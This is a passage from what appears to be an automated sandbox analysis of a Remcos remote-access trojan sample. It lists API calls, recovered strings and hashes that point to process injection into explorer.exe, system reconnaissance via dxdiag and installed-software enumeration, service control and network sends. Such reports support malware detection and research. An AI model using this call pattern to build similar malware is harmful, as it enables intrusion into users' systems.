                                                  • _free.LIBCMT ref: 0043A9C3
                                                  • _free.LIBCMT ref: 0043A9CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                  • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,?,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                  • __freea.LIBCMT ref: 0044AEB0
                                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                  • __freea.LIBCMT ref: 0044AEB9
                                                  • __freea.LIBCMT ref: 0044AEDE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                  • String ID: tC
                                                  • API String ID: 2597970681-886086030
                                                  • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                  • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F88), ref: 00405641
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: d8db7c0c8914d46a6c34734868d0caaf10a4de0ced0ee37207e4465965f615c8
                                                  • Instruction ID: af141abdc89e6f99b360bf73ca1bd21391e8bea30a055eafc68b1e1601de11b4
                                                  • Opcode Fuzzy Hash: d8db7c0c8914d46a6c34734868d0caaf10a4de0ced0ee37207e4465965f615c8
                                                  • Instruction Fuzzy Hash: 6F419E71604301ABCB14FB76DC5A86F37A9AB85704F40493EF516A32E1EF3C8905CB9A
                                                  APIs
                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                  • String ID: <$@$@VG$@VG$Temp
                                                  • API String ID: 1704390241-1291085672
                                                  • Opcode ID: 5f9c2bd0c0372d95574c878ba50052bf7e716ae0a8efeeb3957e5dfb32d9b5ef
                                                  • Instruction ID: 17e4c8e037c7e297ff37edeb8814921eaebe5ca95f3622e3753009d7d6553322
                                                  • Opcode Fuzzy Hash: 5f9c2bd0c0372d95574c878ba50052bf7e716ae0a8efeeb3957e5dfb32d9b5ef
                                                  • Instruction Fuzzy Hash: 15417E319002199ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                  • int.LIBCPMT ref: 00410EBC
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                  • String ID: <kG$@!G$@kG
                                                  • API String ID: 3815856325-4100743575
                                                  • Opcode ID: 3cfe506f9a7656ea2b2d0a15ede2b437be1b76049658b088658781c59662d769
                                                  • Instruction ID: 0588f859592fb32d2b707c82d02c9514845f82bff388d80d729849e078334d39
                                                  • Opcode Fuzzy Hash: 3cfe506f9a7656ea2b2d0a15ede2b437be1b76049658b088658781c59662d769
                                                  • Instruction Fuzzy Hash: 622107329005249BCB14FBAAD8429DE7769DF48324F21416FF904E72D1DBB9AD818BDC
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 8b5b5f1da3120be2e1d024834cc7b090336e4971a053d06d6602a379cddfb217
                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                  • Opcode Fuzzy Hash: 8b5b5f1da3120be2e1d024834cc7b090336e4971a053d06d6602a379cddfb217
                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                  APIs
                                                  • _free.LIBCMT ref: 004481B5
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004481C1
                                                  • _free.LIBCMT ref: 004481CC
                                                  • _free.LIBCMT ref: 004481D7
                                                  • _free.LIBCMT ref: 004481E2
                                                  • _free.LIBCMT ref: 004481ED
                                                  • _free.LIBCMT ref: 004481F8
                                                  • _free.LIBCMT ref: 00448203
                                                  • _free.LIBCMT ref: 0044820E
                                                  • _free.LIBCMT ref: 0044821C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                  Strings
                                                  • DisplayName, xrefs: 0041C7CD
                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C738
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                  • API String ID: 1332880857-3614651759
                                                  • Opcode ID: 64caa6ff9415cfdc1d1bb9dcad396856c1bbc46db7edfbb1e27434fbf092dd17
                                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                  • Opcode Fuzzy Hash: 64caa6ff9415cfdc1d1bb9dcad396856c1bbc46db7edfbb1e27434fbf092dd17
                                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: 280b342e96eb60373c6d8cbc966ef08ffda00c76e87a53f0fbc1635053a822d4
                                                  • Instruction ID: 4d831fdf2c11e0d815db77489a542135a470e493f6e320739c61594aa9f7fbeb
                                                  • Opcode Fuzzy Hash: 280b342e96eb60373c6d8cbc966ef08ffda00c76e87a53f0fbc1635053a822d4
                                                  • Instruction Fuzzy Hash: A4313D71940119AADB04FBA1DC96DED7739AF50309F00017EF606731E2EF785A8ACA9C
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00472B28,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                                  • GetCurrentProcess.KERNEL32(00472B28,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\1.exe), ref: 004074D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                  • API String ID: 2050909247-4242073005
                                                  • Opcode ID: a6b1f7e6a89e8d10aee47b8b65162d365cd1003091a90439fbe9ba5c5e211239
                                                  • Instruction ID: b8c3dc73ce560081c95a6921e0e4b034ac7c55c8f908ce4a4bfc67d5bc942e58
                                                  • Opcode Fuzzy Hash: a6b1f7e6a89e8d10aee47b8b65162d365cd1003091a90439fbe9ba5c5e211239
                                                  • Instruction Fuzzy Hash: 7631C271604700ABD311EF65DE46F1677A8FB48315F10087EF509E6292DBB8B8418B6E
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                  • lstrcpynA.KERNEL32(00474B70,Remcos,00000080), ref: 0041D558
                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B58), ref: 0041D56E
                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                  • Instruction ID: c2fc9e39e559a2afed00746d39c192473857db467f2681b349ddfe36236392a3
                                                  • Opcode Fuzzy Hash: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                  • Instruction Fuzzy Hash: 11015EB1840348EBD7109FA1EC4CFABBBBCABC5705F00406AF505921A1D7B8E885CB6D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0SG$0Q$C:\Users\user\Desktop\1.exe$HVP$xdF
                                                  • API String ID: 0-2830591306
                                                  • Opcode ID: d9e7b8abb9b19c52ecfd7cd53a2e456be13f4b80e0b8c4509a1789e067564b9f
                                                  • Instruction ID: 8e81a4762a03630119b5543cf4782e43f3d691fcab72f30749e56a9243805afb
                                                  • Opcode Fuzzy Hash: d9e7b8abb9b19c52ecfd7cd53a2e456be13f4b80e0b8c4509a1789e067564b9f
                                                  • Instruction Fuzzy Hash: 08F0F6B0A14141ABCB1067355D286AA3756A784397F00487BF547FB2F2EBBD5C82861E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                  • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                  • __freea.LIBCMT ref: 00454083
                                                  • __freea.LIBCMT ref: 0045408F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                  • String ID:
                                                  • API String ID: 3256262068-0
                                                  • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                  • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                  • _free.LIBCMT ref: 00445515
                                                  • _free.LIBCMT ref: 0044552E
                                                  • _free.LIBCMT ref: 00445560
                                                  • _free.LIBCMT ref: 00445569
                                                  • _free.LIBCMT ref: 00445575
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
